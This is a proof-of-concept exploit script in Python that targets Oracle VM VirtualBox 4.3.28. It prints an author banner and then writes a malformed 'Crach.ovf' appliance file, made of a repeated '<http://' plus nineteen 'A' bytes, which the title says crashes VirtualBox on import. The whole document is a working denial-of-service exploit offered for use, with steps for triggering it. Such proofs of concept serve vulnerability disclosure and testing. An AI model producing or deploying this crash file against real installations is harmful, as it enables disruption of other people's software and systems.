
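#Exploit Title: Oracle VM VirtualBox 4.3.28 Crash
#Author: sultan albalawi
#Tested on:win7
#open virtualbox -->ctrl+i-->choose file -->double+double+double next
#
# Crash proof-of-concept. The script does nothing but write a malformed
# .ovf appliance descriptor ("Crach.ovf") into the current directory; per the
# title, importing that file (Ctrl+I) into VirtualBox 4.3.28 makes the
# application crash. The script never talks to VirtualBox itself, and nothing
# here shows more than a crash (denial of service) of the importing process.
#
# The source is written for Python 2; the print/format calls below are kept in
# a form that runs unchanged on Python 2 and 3.

# ASCII-art banner, stored as hex escapes (CRLF line ends), printed before the
# file is written. Purely cosmetic; the payload does not depend on it.
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
ban+='\n'
ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
print(ban)

# Descriptor fragments. The whole "payload" is a run of 19 'A' (0x41) bytes
# wrapped in "<http://" ... ">", written twice back to back; no OVF/XML
# structure is produced beyond that.
pof1 = "<"
pof2 = "http://"
Crash = "\x41"*19
pof3=">"
vm = pof1+pof2+Crash+pof3+pof1+pof2+Crash+pof3

# Output path, relative to the current working directory (kept as the author
# spelled it).
Crash_file = "Crach.ovf"

# `with` guarantees the handle is closed even if write() raises, and avoids
# binding the builtin name `file` to the handle.
with open(Crash_file, "w") as out:
    out.write(vm)

# The original message was 'file done'.format(Crash_file): no placeholder, so
# the file name was silently dropped. Include it so the user sees what was
# written and where.
print('file done: {0}'.format(Crash_file))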